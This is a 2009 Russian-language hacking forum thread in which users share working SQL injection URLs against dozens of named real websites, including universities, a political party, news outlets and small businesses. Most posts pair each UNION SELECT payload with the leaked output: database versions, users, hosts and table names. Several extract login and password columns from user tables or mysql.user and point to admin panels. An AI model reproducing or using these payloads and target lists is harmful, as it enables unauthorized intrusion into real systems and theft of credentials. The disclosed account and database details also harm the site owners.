http://dev.onlinedrummer.com/article.php?id=-21+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14--
5.0.45-community:oldpublic@localhost:SiteFeatures
http://developpement-durable.ujjef.com/point.php?id=4+union+select+1,2,3,group_concat(tab le_name),5,6,7,8,9,10,11,12,13,14,15+from+informat ion_schema.tables--
http://www.golfdirect.co.za/golf.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9--
5.0.81-community:wwwgolf_golfdirect:wwwgolf_golfd@localho st
HAXTA4OK
22.07.2009, 23:36
http://www.ort.be/ortsite/index.php?nid=-134+union+select+1,concat_ws(0x3a,database(),user( ),version()),3,4,5,6,7,8,9,10--
ORTWEBSITE:HY_ORTWEBSITE@LOCALHOST:4.1.22-COMMUNITY-NT
####################################
Харьковский национальный университет радиоэлектроники Кафедра основ радиотехники
http://ort.kture.kharkov.ua/prepod.php?type=view&id=-1'+union+select+1,concat_Ws(0x3a,database(),user() ,version()),3,4,5,6,7,8,9/*
siteprom_ort:siteprom_ort@ws10.kture.itl.net.ua:4. 1.22-standard-log
####################################
http://www.pnp.de/nachrichten/kommunalwahl08/ort.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5,6,7--
PNP@HTTP.VGP.DE:KOMMUNALWAHL_2008:5.1.34-LOG
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.chorverband-ekhn.de/fcnd/showobject.php?art=ort&id=-1+union+select+concat_Ws(0x3a,database(),user(),ve rsion())--
Ort: db230516389:dbo230516389@212.227.29.9:4.0.27-max-log
http://www.thewest.cz/portal/clanek_cely.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user()),7 ,8,9,10,11,12,13+from+users--
http://billiard4u.ru/faq/faq.php?id=-1+union+select+1,2,concat_WS(0x3a,password,login), 4,5,6+from+user--
http://www.cartell.ru/faq.php?id=-13+union+select+1,2,group_concat(table_name),4+fro m+information_schema.tables--
http://www.sky-radio.fm/sreda/print.php?sid=-1+union+select+1,2,concat_ws(0x3a,user_name,user_p assword),4,5,6+from+fphotos_users+limit+0,1--
molotovkeyt
23.07.2009, 06:57
Мего-дизайнерская контора "Пиментос" со своим дырявым сайтом.
http://pimentos.com.ua/?mid=15&action=news_detail&new_id=-74+union+select+1,2,version%28%29,4,5,6,7,8,9,0,1, 2,3,14--
В разделе "Наши работы" примерно 90% из почти 60 сайтов имеют sql inj.
У всех базы 5-ой ветки.
Самые интресные из них:
Оффициальный сайт украинской партии "Реформы и порядок"
http://www.prp.org.ua/index.php?mid=15&action=posit_full&id=-56+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1--
Сайт всеукраинского журнала "Стройся!"
http://www.strojsya.kiev.ua/?mid=4&action=price_list&rubric_id=-3521+union+select+1,2,3,version%28%29,5,6--
HAXTA4OK
23.07.2009, 12:48
http://pfarre.deutschwagram.com/Ort.php?ID=1+union+select+1,concat_ws(0x3a,user(), database(),version()),3,4,5--
pfarre@localhost:pfarre:5.0.22-Debian_0ubuntu6.06.10-log
Staratel
23.07.2009, 15:19
http://www.air-bed.ru/cover.php?name=compare&id_groups=1'+union+select+unhex(hex(version()))/*
http://www.air-bed.ru/cover.php?name=compare&id_groups=1'+union+select+password+from+users/*
http://www.brettex.com.ua/index.php?dir=oblad&page=oblad&dev=35'+union+select+1,concat_ws(0x3a,user(),versi on(),database()),3,4,5,6,7,8--+
User: u_brettex@localhost
Version: 4.1.22-log
DB: brettex
beerhack
23.07.2009, 18:55
http://rapl.ru/article.php?id=-39'+union+select+1,version(),3,4,5,6,7,8,9/*
Database Version: 5.0.45-community-nt-log
Database name: 1gb_x_rplf
User name: 1gb_x_rplf@127.0.0.1
-------------------------------------------------------------------
http://cbskiev.library.ru/system/smi/article.php?id=39+union+select+1,version(),3,4,5,6 ,7,8,9,0/*
Database Version: 4.1.20
Database name: cbskiev_db01
User name: libsites@localhost
ph1l1ster
23.07.2009, 21:13
Порция сладенького ;)
wallace.edu
PR 6
5.0.45-community-nt-log:web_mysql@localhost
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-14+union+select+1,concat(version(),0x3a,user()),3, 4,5,6--
MySql:
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-14+union+select+1,concat(user,0x3a,password),3,4,5 ,6+from+mysql.user--
fasn.rutgers.edu
PR 6
root@ru-6j16advh2j9z:5.0.45-community-nt
http://fasn.rutgers.edu/announcements.php?id=-14+union+Select+1,2,concat(user(),0x3a,version()), 4,5--
File_priv = Y
MySql:
http://fasn.rutgers.edu/announcements.php?id=-14+union+Select+1,2,concat(user,0x3a,password),4,5 +from+mysql.user--
hedgecock.bio.jhu.edu
PR 5
4.0.15-standard:webserver@localhost
http://hedgecock.bio.jhu.edu/information/article.php?id=-14+union+select+1,2,concat(version(),0x3a,user()), 4,5,6--
http://hedgecock.bio.jhu.edu/information/article.php?id=-14+union+select+1,2,concat(name,0x3a,pass),4,5,6+f rom+users--
library.ccuniversity.edu
PR 5
5.0.37-community-nt:root@localhost
http://library.ccuniversity.edu/index.php?ID=14+and+1=0+Union+Select+1,concat(vers ion(),0x3a,user()),3--
File_priv = Y
[PR 3]
http://www.dreambike.biz/pregled.php?id=-832+union+select+concat_ws(0x3a,version(),database (),user())
4.1.20:dreambike:dreambike0@localhost
table 'admin' Found
====================================
[PR 2]
http://www.giacint.biz/sobitiya_txt.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6
5.0.81-community:favorite_giacint:favorite_favorit@localh ost
====================================
[PR 2]
http://www.traxon.be/bandpress/product.php?id=9999999999+union+select+1,2,3,4,5,6 ,7,8,9,concat_ws(0x3a,version(),database(),user()) ,11,12,13,14,15,16--&type=sh
5.0.45-Dotdeb_0.dotdeb.1.1.CGA.1:traxon:admin@hostingst50 9.isp.belgacom.be
====================================
[PR 2]
http://neftekamsk.biz/section.php?id=-10011+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7
4.1.22-log:wwwurengoyinforu_neftekamsk:neftekam_nefteka@f e51.hc.ru
====================================
[PR 0]
http://blogpost.photowork.biz/item.php?id=-250272+union+select+concat_ws(0x3a,version(),datab ase(),user())
4.1.22-standard-log:photowor_ecost:photowor_testig@localhost
====================================
[PR 0]
http://www.at-rent.be/product.php?id=-50+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user())--
5.0.32-Debian_7etch3-log:atrent:atrent@localhost
http://www.at-rent.be/product.php?id=-50+union+select+1,2,3,concat_ws(0x3a,username,user _password)+from+phpbb_users--
====================================
[PR 0]
http://www.boardgameextras.co.uk/item.php?id=270&name=100+Mini+Euro+Card+Sleeves+%2845+MM+X+68+MM%2 9&cat=48&sub_cat=0+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--
4.0.26-standard-log:VerseAD_bgshop:VerseAD_website@80.253.99.23
====================================
[PR 0]
http://www.psychologi.biz/detail.php?id=99999999+union+select+concat_ws(0x3a ,version(),database(),user()),2,3,4,5,6,7,8
5.0.77:intertime_psyc:intertime_psyc@localhost
====================================
[PR 0]
http://biz.bdnews24.com/details.php?id=-89641+union+select+concat_ws(0x3a,version(),databa se(),user()),2,3,4,5,6,7&cid=4
5.0.45-log:aplustemp:aplus@localhost
HAXTA4OK
24.07.2009, 08:52
http://www.inrp.fr/ardist2005/resume.php?Rtr=Cr137&Id=1+and+substring(version(),1,1)=5--
http://www.mrech.ru/index.phtml?f=doc5&id_docs=-258/**/UNION/**/SELECT/**/1,password,name,4,5,6,7,8,9+from+admins--+
HAXTA4OK
24.07.2009, 09:29
ТИЦ: 550
PR: 4
http://www.palmq.ru/sections.php?op=viewarticle&artid=-89+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10--
palmqru@localhost:db_palmqru:5.0.51a-community
tables:nuke_downloads_editorials,nuke_ephem,nuke_b anner,nuke_comments,nuke_quizz_datacontrib,nuke_li nks_links,nuke_referer,nuke_links_votedata,nuke_re views_comments,nuke_poll_desc,nuke_sectopics,nuke_ quizz_admin,phpads_affiliates,phpads_config,phpads _userlog,nuke_topics,phpads_acls,nuke_downloads_mo drequest,nuke_faqAnswer,nuke_bannerclient,nuke_cou nter,nuke_quizz_categories,nuke_headlines,nuke_qui zz_desc,nuke_links_modrequest,nuke_related,nuke_me ssage,nuke_reviews_main,nuke_pollcomments,nuke_sel lers,phpads_banners,phpads_images,phpads_zones,nuk e_users,phpads_adclicks,nuke_downloads_newdownload ,nuke_faqCategories,nuke_authors,nuke_bannerfinish ,nuke_downloads_categories,nuke_quizz_check,nuke_l inks_categories,nuke_quizz_descontrib,nuke_links_n ewlink,nuke_reviews,nuke_poll_check,nuke_seccont,n uke_priv_msgs,nuke_sellers_cities,phpads_adstats,p hpads_cache,phpads_session,nuke_stories,pda_downlo ads_categories,nuke_downloads_downloads,nuke_downl oads_votedata,nuke_graveyard,nuke_autonews,nuke_bl ocks,nuke_session,nuke_quizz_da
http://synapse-design.de/amanda-tapping/news.php?id=-315+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7,8--
tapping:5.0.45:login@server12.host2day.com
http://www.heavyworlds.com/news.php?id=-4813+union+select+1,2,3,concat_ws(0x3a,database(), version(),user()),5--
Sql156633_1:5.0.68-log:Sql156633@62.149.141.54
http://www.hardsignal.net/news.php?read=1&id=-9+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
djpauzec_hardsignal:5.0.75-community-log:djpauzec_djpauze@localhost
http://www.biomedis.ru/news.php?newsId=-2+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6--
admin_biomedis:5.0.37-standard:admin_ulisss@localhost
http://www.underoath777.com/news.php?id=-145+union+select+1,2,3,4,concat_ws(0x3a,database() ,version(),user()),6--
underoath:5.0.67-log:underoath@208.113.245.251
Calcutta
24.07.2009, 21:10
http://podcastchicago.tv/category.php?id=2611+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18--
5 ветка.
HAXTA4OK
24.07.2009, 22:19
PR: 4
http://www.animal-law.biz/talk.php?type=gg&view=full&id=1+union+select+1,concat_ws(0x3a,database(),user (),version()),3,4,5,6
anima4:anima4@localhost:4.0.27-log
####################################
http://www.opisy-gg.info.pl/categories.php?id=1+and+substring(version(),1,1)=5--
####################################
PR: 3
http://www.gicma.gg/news_view.php?id=1+union+select+concat_ws(0x3a,ver sion(),user(),database()),2,3--
5.0.82-community:web35-gicma@79.170.40.35:web35-gicma
####################################
PR: 4
http://www.ekabaret.pl/gg.php?id=1+and+substring(version(),1,1)=5
mr.gr33n
24.07.2009, 23:43
http://www.mypsion.ru/news.php?id=-7+union+select+1,UNHEX(hex(concat(0x3c63656e746572 3e3c68313e416e7469636861743c2f68313e3c2f63656e7465 723e3c62722f3e,user(),0x3c62722f3e,version(),0x3c6 2722f3e,database()))),3,4,5,6,7,8--
PR:4 ТиЦ: 300
http://www.colortv.ru/news.php?id=-7+union+select+1,2,3,concat(0x3c63656e7465723e3c68 313e416e7469636861743c2f68313e3c2f63656e7465723e3c 62722f3e,version(),0x3a,user(),0x3a,database()),5, 6,7--
PR:4 тNц:40
какая-то online игра
http://questgames.info/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,use r_password)KHG+from+e107_user+where+user_id=1--
http://www.sme.com.ph/sme-resources-tools/resources-tools.php?page=articles&id=-23+union+select+concat_ws(0x3a,version(),database( ),user()),2,3,4,5,6--
4.1.22-standard:smecom_db:smecom_user@localhost
http://www.robottrading.com.au/tools.php?id=-23+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7--
4.0.27-Max-log:db_robo_data:db_robo_data@piro.server101.com
http://katalog.motorky.com/moto.php?id=-23+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9--
5.0.30-Debian_3:motorky@localhost:motorky 3 Табличка moto_users
ph1l1ster
25.07.2009, 02:10
http://www.wxdu.duke.edu/plmanager/world/djplaylists.php?id=-54+union+select+concat(login,0x3a,password),2,3,4, 5,6,7,8,9,10,11+from+logins--
http://www.wxdu.duke.edu/plmanager/
pelligrim
25.07.2009, 15:11
http://www.evildread.com/asian-reviews/asian_review.php?id=9999+union+select+1,2,3,4,5,6, 7,concat_ws(0x3a,version(),database(),user()),9,10 ,11,12,13,14,15,16,17,18,19,20
5.0.32-Debian_7etch10-log:evildread_com:evildread_com@srv39.one.com
http://www.sendandserve.co.uk/publications_detail.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4--
5.0.82-community:web20_serve:web20_serve@localhost
http://www.chocolateguns.com/discography.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21--
5.0.68-log:Sql121050_1:Sql121050@62.149.141.69
hatamahata
26.07.2009, 03:09
http://www.dfhklab.com.hk/eng/main.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8--
5.0.67-community:dfhklab_db:dfhklab_db@localhost
http://www.igp.pt/main.php?Id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9--
4.0.14-STANDARD:WOF:JAFONSO@OCTOPUS
mr.gr33n
26.07.2009, 04:41
З.ы, стоит всем посмотреть какой тут пароль xDD
http://www.consultunion.ru/news.php?id=-7+union+select+1,2,3,4,concat(login,0x3a,pass),6,7 +from+accounts--
http://www.magry.ru/news.php?id=-7+union+select+concat(login,0x3a,pass)+from+users--
http://www.taktika-irk.ru/news.php?id=-7+union+select+1,concat(Name,0x3a,Pass),3,4+from+u ser--
http://www.pavsekakii.ru/news.php?page=1&id=-7+union+select+1,concat(version(),0x3a,user(),0x3a ,database())--
надоели всякие гороскопы )))
http://banzay-kazan.ru/news.php?id=-7+union+select+1,concat(login,0x3a,psw),3,4,5,6,7+ from+login--
http://sib-usadba.ru/news.php?id=-7+union+select+1,2,3,concat(username,0x3a,password ),5,6+from+jos_users--
http://autosklad35.ru/news/news.php?id=-7+union+select+1,2,3,concat(login,0x3a,pass),5+fro m+shops--
http://ocenshik.mostpp.ru/news.php?id=-7+union+select+1,2,3,4,concat(user,0x3a,password), 6,7,8+from+mysql.user--
root@zvm27.host.ru:4.0.27
http://fibroblok.ru/cms-news.php?mode=view_news&id=-7+union+select+1,concat_ws(0x3a,version(),user()), 3,4,5,6--
http://www.pilorama.ru/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5,6,7--
http://www.terta-avangard.ru/news.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8--
http://reklamagoroda.ru/news.php?id=-7+union+select+1,concat(username,0x3a,password),3, 4,5,6,7+from+rbg_users--
http://reklamagoroda.ru/admin/
http://www.sibezrcs.ru/articles.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8,9,0,1--
http://www.semsk.kz/newscat.php?id=-7+union+select+concat_ws(0x3a,database(),version() ,user())--
semsk_main:5.0.45:semsk_main@localhost
http://www.designershoes.name/gucci-sneakers-trainers.php?id=-357+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5--
shoes:4.0.27-log:designer@localhost
[PR: 5]
http://www.iso.ru/cgi-bin/main/reports.cgi?what=rep&id=35+and+substring(version(),1,1)=3
User: root@localhost
Version: 3.23.41
DB: iso_new
dr.Pilulkin
26.07.2009, 17:08
http://www.wrightbalance.com/tips/index.php?article=-88+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7--
mindun2_mindun2@localhost:5.0.67-community:mindun2_MUP
mindun2_MUP:User:Password
mindun2_MUP:phplist_admin:password
mindun2_MUP:phplist_user_user:password
=========
http://www.stewartscannock.co.uk/print.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),version(),database()),11,12,13,14,15,16,17,18 ,19--
stewarts@localhost:4.0.27-standard:stewartscannock_co_uk
=========
http://www.flevolandsebeamerverhuur.nl/print.php?op=printapage&pageid=-7+union+select+1,2,database(),4,5--
flbeve@localhost:5.0.51a-12-log:flbeve
flbeve:net_aid:pwd
=======
http://www.nregion.com/print.php?i=-5518+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9--
nregion@91.102.154.144:5.1.30:wwwnregioncom
=======
http://www.segodnia.ru/print.php?s=0&n=-7526+union+select+concat_ws(0x3a,user(),version(), database()),2,3,4,5--
sega@localhost:5.1.22-rc:sedoy
=======
http://www.apn-nn.ru/print.php?typ=pub&id=-777+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5--
apnnn@localhost:5.0.70-log:apnnn
apn_nn:usr:pass
kislovsky:usr:pass
http://www.1989history.eu/view_project.php?id=-70+union+select+1,2,3,4,5,6,7--
Database Version: 4.1.22-standard
Database name: eu1989_eustory
User name: eu1989_eu1989@localhost
http://www.smdailyjournal.com/article_preview.php?id=-66988+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4--
Database Version: 4.0.25
Database name: smdaily2
User name: smdaily2@localhost
+++AndreyDevil+++
27.07.2009, 00:44
http://tjnm.tsnm.org/tjnm/content.php?id=LTEnIHVuaW9uIHNlbGVjdCAxLDIsdmVyc2l vbigpLDQsdXNlcigpLDYsNyw4LS0g
5.0.67-community
tsnm_user@localhost
tsnm_dergi
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot